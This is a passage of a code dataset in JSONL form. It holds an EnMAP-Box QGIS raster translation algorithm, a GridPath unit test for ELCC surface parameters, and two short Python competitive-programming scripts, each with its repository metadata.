_UNSET_NODATA = 'unsetNoData', 'Unset no data value'\r\n P_WORKING_DATA_TYPE, _WORKING_DATA_TYPE = 'workingType', 'Working Data type'\r\n P_DATA_TYPE, _DATA_TYPE = 'dataType', 'Data type'\r\n P_CREATION_PROFILE, _CREATION_PROFILE = 'creationProfile', 'Output options'\r\n P_OUTPUT_RASTER, _OUTPUT_RASTER = 'outputTranslatedRaster', 'Output raster layer'\r\n\r\n def displayName(self):\r\n return 'Translate raster layer'\r\n\r\n def shortDescription(self):\r\n return 'Convert raster data between different formats, ' \\\r\n 'potentially performing some operations like spatial subsetting, spatial resampling, reprojection, ' \\\r\n 'band subsetting, band reordering, data scaling, no data value specification, and data type conversion.'\r\n\r\n def helpParameters(self) -> List[Tuple[str, str]]:\r\n return [\r\n (self._RASTER, 'Source raster layer.'),\r\n (self._BAND_LIST, 'Bands to subset and rearrange. '\r\n 'An empty selection defaults to all bands in native order.'),\r\n (self._GRID, 'The destination grid.'),\r\n (self._COPY_METADATA, 'Whether to copy GDAL metadata from source to destination.'),\r\n (self._COPY_STYLE, 'Whether to copy style from source to destination.'),\r\n (self._EXCLUDE_BAD_BANDS, 'Whether to exclude bad bands (given by BBL metadata item inside ENVI domain). '\r\n 'Also see The ENVI Header Format for more details: '\r\n 'https://www.l3harrisgeospatial.com/docs/ENVIHeaderFiles.html'),\r\n (self._EXCLUDE_DERIVED_BAD_BANDS,\r\n 'Whether to derive and exclude additional bad bands fully filled with inf, nan or no data values.'),\r\n (self._WRITE_ENVI_HEADER, 'Whether to write an ENVI header *.hdr sidecar file with '\r\n 'spectral metadata required for proper visualization in ENVI software.'),\r\n (self._CREATION_PROFILE, 'Output format and creation options. '\r\n 'The default format is GeoTiff with creation options: '\r\n '' + ', '.join(self.DefaultGTiffCreationOptions)),\r\n (self._SPECTRAL_RASTER, 'A spectral raster layer used for specifying a band subset '\r\n 'by matching the center wavelength.'),\r\n (self._SPECTRAL_BAND_LIST, 'Spectral bands used to match source raster bands.'\r\n 'An empty selection defaults to all bands in native order.'),\r\n (self._OFFSET, 'A data offset value applied to each band.'),\r\n (self._SCALE, 'A data gain/scale value applied to each band.'),\r\n (self._EXTENT, 'Spatial extent for clipping the destination grid, '\r\n 'which is given by the source Raster or the selected Grid. '\r\n 'In both cases, the extent is aligned with the actual pixel grid '\r\n 'to avoid subpixel shifts.'),\r\n (self._SOURCE_COLUMNS, 'Column subset range in pixels to extract.'),\r\n (self._SOURCE_ROWS, 'Rows subset range in pixels to extract.'),\r\n (self._RESAMPLE_ALG, 'Spatial resample algorithm.'),\r\n (self._SOURCE_NODATA, 'The value to be used instead of the original raster layer no data value.'),\r\n (self._NODATA, 'The value to be used instead of the default destination no data value.'),\r\n (self._UNSET_SOURCE_NODATA, 'Whether to unset (i.e. not use) the source no data value.'),\r\n (self._UNSET_NODATA, 'Whether to unset the destination no data value.'),\r\n (self._WORKING_DATA_TYPE, 'Working data type that is applied before resampling.'),\r\n (self._DATA_TYPE, 'Output data type.'),\r\n (self._OUTPUT_RASTER, self.RasterFileDestination)\r\n ]\r\n\r\n def checkParameterValues(self, parameters: Dict[str, Any], context: QgsProcessingContext) -> Tuple[bool, str]:\r\n return True, ''\r\n\r\n def parameterAsSourceWindowExtent(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext\r\n ) -> QgsRectangle:\r\n\r\n raster = self.parameterAsRasterLayer(parameters, self.P_RASTER, context)\r\n provider: QgsRasterDataProvider = raster.dataProvider()\r\n\r\n xmin, xmax = self.parameterAsRange(parameters, self.P_SOURCE_COLUMNS, context)\r\n ymin, ymax = self.parameterAsRange(parameters, self.P_SOURCE_ROWS, context)\r\n skipRangeX = isnan(xmin) and isnan(xmax)\r\n skipRangeY = isnan(ymin) and isnan(ymax)\r\n if skipRangeX and skipRangeY:\r\n return QgsRectangle()\r\n\r\n if isnan(xmin):\r\n xmin = 0\r\n if isnan(ymin):\r\n ymin = 0\r\n if isnan(xmax):\r\n xmax = xmin + raster.width() - 1\r\n if isnan(ymax):\r\n ymax = ymin + raster.height() - 1\r\n p1: QgsPoint = provider.transformCoordinates(QgsPoint(xmin, ymin), QgsRasterDataProvider.TransformImageToLayer)\r\n p2: QgsPoint = provider.transformCoordinates(\r\n QgsPoint(xmax + 1, ymax + 1), QgsRasterDataProvider.TransformImageToLayer\r\n )\r\n return QgsRectangle(QgsPointXY(p1), QgsPointXY(p2))\r\n\r\n def group(self):\r\n return Group.RasterConversion.value\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterRasterLayer(self.P_RASTER, self._RASTER)\r\n self.addParameterBandList(\r\n self.P_BAND_LIST, self._BAND_LIST, parentLayerParameterName=self.P_RASTER, optional=True\r\n )\r\n self.addParameterRasterLayer(self.P_GRID, self._GRID, None, True)\r\n self.addParameterBoolean(self.P_COPY_METADATA, self._COPY_METADATA, True)\r\n self.addParameterBoolean(self.P_COPY_STYLE, self._COPY_STYLE, False)\r\n self.addParameterBoolean(self.P_EXCLUDE_BAD_BANDS, self._EXCLUDE_BAD_BANDS, False)\r\n self.addParameterBoolean(self.P_EXCLUDE_DERIVED_BAD_BANDS, self._EXCLUDE_DERIVED_BAD_BANDS, False)\r\n self.addParameterBoolean(self.P_WRITE_ENVI_HEADER, self._WRITE_ENVI_HEADER, True)\r\n self.addParameterRasterLayer(self.P_SPECTRAL_RASTER, self._SPECTRAL_RASTER, None, True, True)\r\n self.addParameterBandList(\r\n self.P_SPECTRAL_BAND_LIST, self._SPECTRAL_BAND_LIST, None, self.P_SPECTRAL_RASTER, True, True\r\n )\r\n self.addParameterFloat(self.P_OFFSET, self._OFFSET, None, True, None, None, True)\r\n self.addParameterFloat(self.P_SCALE, self._SCALE, None, True, None, None, True)\r\n self.addParameterExtent(self.P_EXTENT, self._EXTENT, None, True, True)\r\n self.addParameterIntRange(self.P_SOURCE_COLUMNS, self._SOURCE_COLUMNS, None, True, True)\r\n self.addParameterIntRange(self.P_SOURCE_ROWS, self._SOURCE_ROWS, None, True, True)\r\n self.addParameterResampleAlg(self.P_RESAMPLE_ALG, self._RESAMPLE_ALG, 0, False, True)\r\n self.addParameterFloat(self.P_SOURCE_NODATA, self._SOURCE_NODATA, None, True, None, None, True)\r\n self.addParameterFloat(self.P_NODATA, self._NODATA, None, True, None, None, True)\r\n self.addParameterBoolean(self.P_UNSET_SOURCE_NODATA, self._UNSET_SOURCE_NODATA, False, False, True)\r\n self.addParameterBoolean(self.P_UNSET_NODATA, self._UNSET_NODATA, False, False, True)\r\n self.addParameterDataType(self.P_WORKING_DATA_TYPE, self._WORKING_DATA_TYPE, None, True, True)\r\n self.addParameterDataType(self.P_DATA_TYPE, self._DATA_TYPE, None, True, True)\r\n self.addParameterCreationProfile(self.P_CREATION_PROFILE, self._CREATION_PROFILE, '', True, False)\r\n self.addParameterRasterDestination(self.P_OUTPUT_RASTER, self._OUTPUT_RASTER, allowEnvi=True, allowVrt=True)\r\n\r\n def processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n raster = self.parameterAsRasterLayer(parameters, self.P_RASTER, context)\r\n provider: QgsRasterDataProvider = raster.dataProvider()\r\n bandList = self.parameterAsInts(parameters, self.P_BAND_LIST, context)\r\n grid = self.parameterAsRasterLayer(parameters, self.P_GRID, context)\r\n if grid is None:\r\n grid = raster\r\n spectralRaster = self.parameterAsSpectralRasterLayer(parameters, self.P_SPECTRAL_RASTER, context)\r\n spectralBandList = self.parameterAsInts(parameters, self.P_SPECTRAL_BAND_LIST, context)\r\n offset = self.parameterAsFloat(parameters, self.P_OFFSET, context)\r\n scale = self.parameterAsFloat(parameters, self.P_SCALE, context)\r\n extent = self.parameterAsExtent(parameters, self.P_EXTENT, context, crs=grid.crs())\r\n if not extent.isEmpty():\r\n extent = Utils.snapExtentToRaster(extent, grid)\r\n sourceWindowExtent = self.parameterAsSourceWindowExtent(parameters, context)\r\n if not sourceWindowExtent.isEmpty():\r\n extent = sourceWindowExtent\r\n grid = raster # even if grid is specified, use the source raster\r\n if extent.isEmpty():\r\n extent = grid.extent()\r\n excludeBadBands = self.parameterAsBoolean(parameters, self.P_EXCLUDE_BAD_BANDS, context)\r\n excludeDerivedBadBands = self.parameterAsBoolean(parameters, self.P_EXCLUDE_DERIVED_BAD_BANDS, context)\r\n resampleAlg = self.parameterAsGdalResampleAlg(parameters, self.P_RESAMPLE_ALG, context)\r\n srcNoDataValue = self.parameterAsFloat(parameters, self.P_SOURCE_NODATA, context)\r\n dstNoDataValue = self.parameterAsFloat(parameters, self.P_NODATA, context)\r\n unsetSrcNoDataValue = self.parameterAsBoolean(parameters, self.P_UNSET_SOURCE_NODATA, context)\r\n unsetDstNoDataValue = self.parameterAsBoolean(parameters, self.P_UNSET_NODATA, context)\r\n dataType = self.parameterAsQgsDataType(parameters, self.P_DATA_TYPE, context, default=provider.dataType(1))\r\n workingDataType = self.parameterAsQgsDataType(parameters, self.P_WORKING_DATA_TYPE, context)\r\n copyMetadata = self.parameterAsBoolean(parameters, self.P_COPY_METADATA, context)\r\n copyStyle = self.parameterAsBoolean(parameters, self.P_COPY_STYLE, context)\r\n writeEnviHeader = self.parameterAsBoolean(parameters, self.P_WRITE_ENVI_HEADER, context)\r\n filename = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_RASTER, context)\r\n format, options = self.parameterAsCreationProfile(parameters, self.P_CREATION_PROFILE, context, filename)\r\n width = int(round(extent.width() / grid.rasterUnitsPerPixelX()))\r\n height = int(round(extent.height() / grid.rasterUnitsPerPixelY()))\r\n crs = grid.crs()\r\n\r\n with open(filename + '.log', 'w') as logfile:\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n reader = RasterReader(raster)\r\n gdalDataType = Utils.qgisDataTypeToGdalDataType(dataType)\r\n\r\n # exclude bad bands\r\n if excludeBadBands or excludeDerivedBadBands:\r\n\r\n def isBadBand(bandNo: int) -> bool:\r\n if excludeBadBands:\r\n if reader.badBandMultiplier(bandNo) == 0:\r\n return True\r\n if excludeDerivedBadBands:\r\n array = reader.array(bandList=[bandNo])\r\n marray = reader.maskArray(\r\n array, bandList=[bandNo],\r\n maskNotFinite=excludeDerivedBadBands,\r\n )\r\n if not np.any(marray):\r\n return True\r\n return False\r\n\r\n if bandList is None:\r\n bandList = list(reader.bandNumbers())\r\n\r\n bandList = [bandNo for bandNo in bandList if not isBadBand(bandNo)]\r\n\r\n # spectral subset\r\n if spectralRaster is not None:\r\n spectralReader = RasterReader(spectralRaster)\r\n\r\n if bandList is None:\r\n bandList = [i + 1 for i in range(reader.bandCount())]\r\n\r\n if spectralBandList is None:\r\n spectralBandList = [i + 1 for i in range(spectralRaster.bandCount())]\r\n\r\n wavelength = np.array([reader.wavelength(bandNo) for bandNo in bandList])\r\n bandList = [int(np.argmin(np.abs(wavelength - spectralReader.wavelength(bandNo))) + 1)\r\n for bandNo in spectralBandList]\r\n\r\n if bandList is None:\r\n nBands = raster.bandCount()\r\n else:\r\n nBands = len(bandList)\r\n\r\n # derive source and destination no data values\r\n if srcNoDataValue is None:\r\n # get no data value from QGIS layer and layer properties\r\n if reader.sourceHasNoDataValue() and reader.useSourceNoDataValue():\r\n srcNoDataValue = None # use default no data value\r\n else:\r\n rasterRanges = reader.userNoDataValues()\r\n if len(rasterRanges) == 1:\r\n srcNoDataValue = rasterRanges[0].min() # use user no data value\r\n else:\r\n srcNoDataValue = 'none' # unset no data value\r\n if unsetSrcNoDataValue:\r\n srcNoDataValue = 'none' # unset no data value\r\n if unsetDstNoDataValue:\r\n dstNoDataValue = 'none' # unset no data value\r\n\r\n infoTail = f' [{width}x{height}x{nBands}]({Utils.qgisDataTypeName(dataType)})'\r\n if format is not None:\r\n infoTail += f' -of {format}'\r\n if options is not None:\r\n infoTail += f' -co {\" \".join(options)}'\r\n infoTail += f' {filename}'\r\n\r\n if workingDataType is None:\r\n rasterSource = raster.source()\r\n else:\r\n rasterSource = Utils.tmpFilename(filename, 'workingRaster.tif')\r\n gdal.Translate(\r\n rasterSource, raster.source(),\r\n options=gdal.TranslateOptions(outputType=Utils.qgisDataTypeToGdalDataType(workingDataType))\r\n )\r\n\r\n gdalDataset = gdal.Open(rasterSource)\r\n assert gdalDataset is not None\r\n\r\n callback = Utils.qgisFeedbackToGdalCallback(feedback)\r\n resampleAlgSupportedByGdalTranslate = resampleAlg not in [gdal.GRA_Min, gdal.GRA_Q1, gdal.GRA_Med,\r\n gdal.GRA_Q3, gdal.GRA_Max]\r\n useGdalTranslate = raster.crs() == crs and resampleAlgSupportedByGdalTranslate and dstNoDataValue is None\r\n if useGdalTranslate:\r\n feedback.pushInfo('Translate raster' + infoTail)\r\n\r\n projWin = (extent.xMinimum(), extent.yMaximum(), extent.xMaximum(), extent.yMinimum())\r\n if not grid.crs().isValid():\r\n # dirty fix for issue #1082\r\n if abs(projWin[2]) == raster.width() and abs(projWin[3]) == raster.height():\r\n projWin = None\r\n\r\n translateOptions = gdal.TranslateOptions(\r\n format=format, width=width, height=height, creationOptions=options, resampleAlg=resampleAlg,\r\n projWin=projWin, bandList=bandList, outputType=gdalDataType, callback=callback,\r\n noData=srcNoDataValue\r\n )\r\n outGdalDataset: gdal.Dataset = gdal.Translate(\r\n destName=filename, srcDS=gdalDataset, options=translateOptions\r\n )\r\n assert outGdalDataset is not None\r\n\r\n # need to explicitely set the GeoTransform tuple, because gdal.Translate extent may deviate slightly\r\n if grid.crs().isValid():\r\n ulx, uly, lrx, lry = projWin\r\n xres = (lrx - ulx) / width\r\n yres = (uly - lry) / height\r\n geoTransform = (ulx, xres, 0., uly, 0., -yres)\r\n outGdalDataset.SetGeoTransform(geoTransform)\r\n else: # use gdal warp\r\n if bandList is not None:\r\n tmpFilename = Utils.tmpFilename(filename, 'bandSubset.vrt')\r\n tmpGdalDataset = gdal.Translate(\r\n destName=tmpFilename, srcDS=gdalDataset, format=self.VrtFormat, bandList=bandList,\r\n noData=srcNoDataValue, callback=callback\r\n )\r\n else:\r\n tmpGdalDataset = gdalDataset\r\n\r\n feedback.pushInfo('Warp raster' + infoTail)\r\n outputBounds = (extent.xMinimum(), extent.yMinimum(), extent.xMaximum(), extent.yMaximum())\r\n dstSRS = crs.toWkt()\r\n resampleAlgString = Utils.gdalResampleAlgToGdalWarpFormat(resampleAlg)\r\n warpOptions = gdal.WarpOptions(\r\n format=format, width=width, height=height, creationOptions=options, resampleAlg=resampleAlgString,\r\n outputBounds=outputBounds, outputType=gdalDataType, dstSRS=dstSRS, srcNodata=srcNoDataValue,\r\n dstNodata=dstNoDataValue, callback=callback\r\n )\r\n outGdalDataset: gdal.Dataset = gdal.Warp(\r\n filename, tmpGdalDataset, options=warpOptions\r\n )\r\n assert outGdalDataset is not None\r\n\r\n del outGdalDataset # close and reopen to write metadata to aux.xml\r\n outGdalDataset = gdal.Open(filename)\r\n\r\n writer = RasterWriter(outGdalDataset)\r\n if bandList is None:\r\n bandList = range(1, reader.bandCount() + 1)\r\n metadata = reader.metadata()\r\n if copyMetadata:\r\n writer.setMetadata(metadata)\r\n else:\r\n for domain in metadata:\r\n writer.setMetadataDomain({}, domain)\r\n for dstBandNo, srcBandNo in enumerate(bandList, 1):\r\n # general metadata\r\n metadata = reader.metadata(srcBandNo)\r\n\r\n if copyMetadata:\r\n writer.setMetadata(metadata, dstBandNo)\r\n # band name\r\n bandName = reader.bandName(srcBandNo)\r\n writer.setBandName(bandName, dstBandNo)\r\n # spectral info\r\n wavelength = reader.wavelength(srcBandNo)\r\n writer.setWavelength(wavelength, dstBandNo)\r\n fwhm = reader.fwhm(srcBandNo)\r\n writer.setFwhm(fwhm, dstBandNo)\r\n badBandMultiplier = reader.badBandMultiplier(srcBandNo)\r\n writer.setBadBandMultiplier(badBandMultiplier, dstBandNo)\r\n else:\r\n for domain in metadata:\r\n writer.setMetadataDomain({}, domain)\r\n\r\n # clean up ENVI metadata domain (see #1098)\r\n metadata = reader.metadataDomain('ENVI')\r\n metadata.pop('wavelength_units', None)\r\n for key in list(metadata):\r\n if len(metadata[key]) == reader.bandCount():\r\n metadata.pop(key, None)\r\n writer.setMetadataDomain(metadata, 'ENVI')\r\n\r\n # clean up Default metadata domain (see #1098)\r\n metadata = reader.metadataDomain()\r\n metadata.pop('wavelength_units', None)\r\n for key in [f'Band_{bandNo}' for bandNo in reader.bandNumbers()]:\r\n metadata.pop(key, None)\r\n writer.setMetadataDomain(metadata)\r\n\r\n if copyStyle:\r\n renderer = raster.renderer().clone()\r\n outraster = QgsRasterLayer(filename)\r\n outraster.setRenderer(renderer)\r\n outraster.saveDefaultStyle(QgsMapLayer.StyleCategory.AllStyleCategories)\r\n del outraster\r\n\r\n driverShortName = writer.gdalDataset.GetDriver().ShortName\r\n del writer, outGdalDataset\r\n\r\n # need to re-open the raster before setting the scal/offset (issue #501)\r\n outGdalDataset = gdal.Open(filename)\r\n writer = RasterWriter(outGdalDataset)\r\n for dstBandNo, srcBandNo in enumerate(bandList, 1):\r\n if offset is None:\r\n writer.setOffset(reader.offset(srcBandNo), dstBandNo)\r\n else:\r\n writer.setOffset(offset, dstBandNo)\r\n if scale is None:\r\n writer.setScale(reader.scale(srcBandNo), dstBandNo)\r\n else:\r\n writer.setScale(scale, dstBandNo)\r\n del writer, outGdalDataset\r\n\r\n if writeEnviHeader:\r\n if driverShortName in ['GTiff', 'ENVI']:\r\n alg = WriteEnviHeaderAlgorithm()\r\n parameters = {alg.P_RASTER: filename}\r\n self.runAlg(alg, parameters, None, feedback2, context, True)\r\n\r\n result = {self.P_OUTPUT_RASTER: filename}\r\n self.toc(feedback, result)\r\n\r\n return result\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/translaterasteralgorithm.py","file_name":"translaterasteralgorithm.py","file_ext":"py","file_size_in_byte":23450,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"27383316193","text":"from collections import OrderedDict\nfrom importlib import import_module\nimport os.path\nimport sys\nimport unittest\n\nfrom tests.common_functions import create_abstract_model, add_components_and_load_data\n\nTEST_DATA_DIRECTORY = os.path.join(\n os.path.dirname(__file__), \"..\", \"..\", \"..\", \"test_data\"\n)\n\n# Import prerequisite modules\nPREREQUISITE_MODULE_NAMES = [\n \"temporal.operations.timepoints\",\n \"temporal.operations.horizons\",\n \"temporal.investment.periods\",\n \"geography.load_zones\",\n \"geography.prm_zones\",\n \"project\",\n \"project.capacity.capacity\",\n \"project.reliability.prm\",\n \"project.reliability.prm.prm_types\",\n]\nNAME_OF_MODULE_BEING_TESTED = \"project.reliability.prm.elcc_surface\"\nIMPORTED_PREREQ_MODULES = list()\nfor mdl in PREREQUISITE_MODULE_NAMES:\n try:\n imported_module = import_module(\".\" + str(mdl), package=\"gridpath\")\n IMPORTED_PREREQ_MODULES.append(imported_module)\n except ImportError:\n print(\"ERROR! Module \" + str(mdl) + \" not found.\")\n sys.exit(1)\n# Import the module we'll test\ntry:\n MODULE_BEING_TESTED = import_module(\n \".\" + NAME_OF_MODULE_BEING_TESTED, package=\"gridpath\"\n )\nexcept ImportError:\n print(\"ERROR! Couldn't import module \" + NAME_OF_MODULE_BEING_TESTED + \" to test.\")\n\n\nclass TestProjELCCSurface(unittest.TestCase):\n \"\"\" \"\"\"\n\n def test_add_model_components(self):\n \"\"\"\n Test that there are no errors when adding model components\n :return:\n \"\"\"\n create_abstract_model(\n prereq_modules=IMPORTED_PREREQ_MODULES,\n module_to_test=MODULE_BEING_TESTED,\n test_data_dir=TEST_DATA_DIRECTORY,\n subproblem=\"\",\n stage=\"\",\n )\n\n def test_load_model_data(self):\n \"\"\"\n Test that data are loaded with no errors\n :return:\n \"\"\"\n add_components_and_load_data(\n prereq_modules=IMPORTED_PREREQ_MODULES,\n module_to_test=MODULE_BEING_TESTED,\n test_data_dir=TEST_DATA_DIRECTORY,\n subproblem=\"\",\n stage=\"\",\n )\n\n def test_data_loaded_correctly(self):\n \"\"\"\n Test that the data loaded are as expected\n :return:\n \"\"\"\n m, data = add_components_and_load_data(\n prereq_modules=IMPORTED_PREREQ_MODULES,\n module_to_test=MODULE_BEING_TESTED,\n test_data_dir=TEST_DATA_DIRECTORY,\n subproblem=\"\",\n stage=\"\",\n )\n instance = m.create_instance(data)\n\n # Set: ELCC_SURFACE_PRM_ZONE_PERIODS\n expected_surface_zone_periods = sorted(\n [\n (\"Nuclear\", \"PRM_Zone1\", 2020),\n (\"Nuclear\", \"PRM_Zone1\", 2030),\n (\"Wind_Solar\", \"PRM_Zone1\", 2020),\n (\"Wind_Solar\", \"PRM_Zone1\", 2030),\n (\"Wind_Solar\", \"PRM_Zone2\", 2020),\n (\"Wind_Solar\", \"PRM_Zone2\", 2030),\n ]\n )\n\n actual_surface_zone_periods = sorted(\n [(s, z, p) for (s, z, p) in instance.ELCC_SURFACE_PRM_ZONE_PERIODS]\n )\n\n self.assertListEqual(expected_surface_zone_periods, actual_surface_zone_periods)\n\n # Param: prm_peak_load_mw\n expected_peak_load = OrderedDict(\n sorted(\n {\n (\"Nuclear\", \"PRM_Zone1\", 2020): 49406.65942,\n (\"Nuclear\", \"PRM_Zone1\", 2030): 49406.65942,\n (\"Wind_Solar\", \"PRM_Zone1\", 2020): 49406.65942,\n (\"Wind_Solar\", \"PRM_Zone1\", 2030): 49406.65942,\n (\"Wind_Solar\", \"PRM_Zone2\", 2020): 49913.83791,\n (\"Wind_Solar\", \"PRM_Zone2\", 2030): 49913.83791,\n }.items()\n )\n )\n\n actual_peak_load = OrderedDict(\n sorted(\n {\n (s, z, p): instance.prm_peak_load_mw[s, z, p]\n for (s, z, p) in instance.ELCC_SURFACE_PRM_ZONE_PERIODS\n }.items()\n )\n )\n\n self.assertDictEqual(expected_peak_load, actual_peak_load)\n\n # Param: prm_annual_load_mwh\n expected_annual_load = OrderedDict(\n sorted(\n {\n (\"Nuclear\", \"PRM_Zone1\", 2020): 242189141,\n (\"Nuclear\", \"PRM_Zone1\", 2030): 242189141,\n (\"Wind_Solar\", \"PRM_Zone1\", 2020): 242189141,\n (\"Wind_Solar\", \"PRM_Zone1\", 2030): 242189141,\n (\"Wind_Solar\", \"PRM_Zone2\", 2020): 244545760.8,\n (\"Wind_Solar\", \"PRM_Zone2\", 2030): 244545760.8,\n }.items()\n )\n )\n\n actual_annual_load = OrderedDict(\n sorted(\n {\n (s, z, p): instance.prm_annual_load_mwh[s, z, p]\n for (s, z, p) in instance.ELCC_SURFACE_PRM_ZONE_PERIODS\n }.items()\n )\n )\n\n self.assertDictEqual(expected_annual_load, actual_annual_load)\n\n # Param: elcc_surface_name\n expected_elcc_surface_names = OrderedDict(\n sorted(\n {\n \"Coal\": None,\n \"Coal_z2\": None,\n \"Gas_CCGT\": None,\n \"Gas_CCGT_New\": None,\n \"Gas_CCGT_New_Binary\": None,\n \"Gas_CCGT_z2\": None,\n \"Gas_CT\": None,\n \"Gas_CT_New\": None,\n \"Gas_CT_z2\": None,\n \"Nuclear\": \"Nuclear\",\n \"Nuclear_z2\": None,\n \"Wind\": \"Wind_Solar\",\n \"Wind_z2\": \"Wind_Solar\",\n \"Battery\": None,\n \"Battery_Binary\": None,\n \"Battery_Specified\": None,\n \"Hydro\": None,\n \"Hydro_NonCurtailable\": None,\n \"Disp_Binary_Commit\": None,\n \"Disp_Cont_Commit\": None,\n \"Disp_No_Commit\": None,\n \"Clunky_Old_Gen\": None,\n \"Clunky_Old_Gen2\": None,\n \"Nuclear_Flexible\": None,\n }.items()\n )\n )\n\n actual_elcc_surface_names = OrderedDict(\n sorted(\n {\n p: instance.elcc_surface_name[p] for p in instance.PRM_PROJECTS\n }.items()\n )\n )\n\n self.assertDictEqual(expected_elcc_surface_names, actual_elcc_surface_names)\n\n # Param: elcc_surface_cap_factor\n expected_elcc_cf = OrderedDict(\n sorted(\n {\n \"Coal\": None,\n \"Coal_z2\": None,\n \"Gas_CCGT\": None,\n \"Gas_CCGT_New\": None,\n \"Gas_CCGT_New_Binary\": None,\n \"Gas_CCGT_z2\": None,\n \"Gas_CT\": None,\n \"Gas_CT_New\": None,\n \"Gas_CT_z2\": None,\n \"Nuclear\": 0.123,\n \"Nuclear_z2\": None,\n \"Wind\": 0.123,\n \"Wind_z2\": 0.123,\n \"Battery\": None,\n \"Battery_Binary\": None,\n \"Battery_Specified\": None,\n \"Hydro\": None,\n \"Hydro_NonCurtailable\": None,\n \"Disp_Binary_Commit\": None,\n \"Disp_Cont_Commit\": None,\n \"Disp_No_Commit\": None,\n \"Clunky_Old_Gen\": None,\n \"Clunky_Old_Gen2\": None,\n \"Nuclear_Flexible\": None,\n }.items()\n )\n )\n\n actual_elcc_cf = OrderedDict(\n sorted(\n {\n p: instance.elcc_surface_cap_factor[p]\n for p in instance.PRM_PROJECTS\n }.items()\n )\n )\n\n self.assertDictEqual(expected_elcc_cf, actual_elcc_cf)\n\n # Set: ELCC_SURFACE_PROJECTS\n expected_elcc_surf_prj = sorted(\n [(\"Nuclear\", \"Nuclear\"), (\"Wind_Solar\", \"Wind\"), (\"Wind_Solar\", \"Wind_z2\")]\n )\n actual_elcc_surf_prj = sorted(\n [(s, p) for (s, p) in instance.ELCC_SURFACE_PROJECTS]\n )\n self.assertListEqual(expected_elcc_surf_prj, actual_elcc_surf_prj)\n\n # Set: ELCC_SURFACE_PROJECTS_BY_PRM_ZONE\n expected_surface_projects_by_zone = OrderedDict(\n sorted(\n {\n \"PRM_Zone1\": [(\"Nuclear\", \"Nuclear\"), (\"Wind_Solar\", \"Wind\")],\n \"PRM_Zone2\": [(\"Wind_Solar\", \"Wind_z2\")],\n }.items()\n )\n )\n\n actual_surface_projects_by_zone = OrderedDict(\n sorted(\n {\n z: [\n (s, p)\n for (s, p) in instance.ELCC_SURFACE_PROJECTS_BY_PRM_ZONE[z]\n ]\n for z in instance.PRM_ZONES\n }.items()\n )\n )\n\n self.assertDictEqual(\n expected_surface_projects_by_zone, actual_surface_projects_by_zone\n )\n\n # Set: ELCC_SURFACE_PROJECT_PERIOD_FACETS\n expected_s_prj_p_f = sorted(\n [\n (\"Nuclear\", \"Nuclear\", 2020, 1),\n (\"Nuclear\", \"Nuclear\", 2020, 2),\n (\"Nuclear\", \"Nuclear\", 2030, 1),\n (\"Nuclear\", \"Nuclear\", 2030, 2),\n (\"Wind_Solar\", \"Wind\", 2020, 1),\n (\"Wind_Solar\", \"Wind\", 2020, 2),\n (\"Wind_Solar\", \"Wind\", 2030, 1),\n (\"Wind_Solar\", \"Wind\", 2030, 2),\n (\"Wind_Solar\", \"Wind_z2\", 2020, 1),\n (\"Wind_Solar\", \"Wind_z2\", 2020, 2),\n (\"Wind_Solar\", \"Wind_z2\", 2030, 1),\n (\"Wind_Solar\", \"Wind_z2\", 2030, 2),\n ]\n )\n\n actual_s_prj_p_f = sorted(\n [\n (s, prj, p, f)\n for (s, prj, p, f) in instance.ELCC_SURFACE_PROJECT_PERIOD_FACETS\n ]\n )\n\n self.assertListEqual(expected_s_prj_p_f, actual_s_prj_p_f)\n\n # Param: elcc_surface_coefficient\n expected_coeff = OrderedDict(\n sorted(\n {\n (\"Nuclear\", \"Nuclear\", 2020, 1): 0.9,\n (\"Nuclear\", \"Nuclear\", 2020, 2): 0.9,\n (\"Nuclear\", \"Nuclear\", 2030, 1): 0.9,\n (\"Nuclear\", \"Nuclear\", 2030, 2): 0.9,\n (\"Wind_Solar\", \"Wind\", 2020, 1): 0.3,\n (\"Wind_Solar\", \"Wind\", 2020, 2): 0.2,\n (\"Wind_Solar\", \"Wind\", 2030, 1): 0.25,\n (\"Wind_Solar\", \"Wind\", 2030, 2): 0.2,\n (\"Wind_Solar\", \"Wind_z2\", 2020, 1): 0.3,\n (\"Wind_Solar\", \"Wind_z2\", 2020, 2): 0.25,\n (\"Wind_Solar\", \"Wind_z2\", 2030, 1): 0.3,\n (\"Wind_Solar\", \"Wind_z2\", 2030, 2): 0.25,\n }.items()\n )\n )\n\n actual_coeff = OrderedDict(\n sorted(\n {\n (s, prj, p, f): instance.elcc_surface_coefficient[s, prj, p, f]\n for (s, prj, p, f) in instance.ELCC_SURFACE_PROJECT_PERIOD_FACETS\n }.items()\n )\n )\n self.assertDictEqual(expected_coeff, actual_coeff)\n","repo_name":"blue-marble/gridpath","sub_path":"tests/project/reliability/prm/test_elcc_surface.py","file_name":"test_elcc_surface.py","file_ext":"py","file_size_in_byte":11366,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"52"} +{"seq_id":"44291717376","text":"import sys\ninput=sys.stdin.readline\n\nNMAX=100000\nl=[0 for _ in range(NMAX+1)]\n\nn=int(input())\nfor _ in range(1,n):\n a, b= map(int,input().split())\n l[a] +=1\n l[b]+=1\n\nn=int(input())\nfor _ in range(n):\n a,b=map(int,input().split())\n if a==2:\n print('yes')\n elif a==1:\n if l[b]>=2:\n print('yes')\n else:\n print('no')\n","repo_name":"eugene028/Algorithm","sub_path":"~2021 algorithm/14675.py","file_name":"14675.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22098370204","text":"n=int(input())\nc=1\ni=2\nwhile n:\n if n%i==0:\n c+=1\n if i>n:\n break\n i+=1\n\n \nif c==2:\n print('prime')\nelse:\n print('not a prime')\n ","repo_name":"Durgaprasad-2002/codemind-python","sub_path":"prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"fa","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} 